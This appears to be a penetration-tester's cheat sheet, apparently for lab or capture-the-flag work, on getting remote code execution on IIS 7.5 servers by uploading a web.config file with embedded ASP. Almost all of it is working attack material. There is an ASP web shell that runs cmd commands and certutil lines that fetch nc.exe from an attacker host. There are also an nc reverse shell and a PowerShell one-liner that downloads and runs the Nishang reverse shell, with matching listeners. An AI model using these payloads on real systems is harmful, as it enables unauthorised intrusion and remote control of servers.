80 http Microsoft IIS httpd 7.5
IIS 7.5 = Windows 2008 R2
IIS Uploads
If you can upload to an IIS site, keep trying to see which extensions are allowed
test.txt ..fail
test.asp ..fail
test.aspx ..fail
test.jpg ..ok
web.config ..ok - we can exploit
RCE webconfig upload
Old Version of IIS 7.5 that accepts fileuploads
We can transfer our 'web.config' that includes some evil-aspx at the bottom
REF:
-------------------------------
vi web.config ..evil asp code at bottom
Response.write(1+2) ..test will equal 3
-------------------------------
cat /opt/shells/web.aspx
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config
-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp
Easy
-----------------------
We will use web.config exploit
First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")
Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo
-----------------------
google iis rce upload
Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")
0xdf wrote this easy one:
To download our Nishang reverse shell and execute it
prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>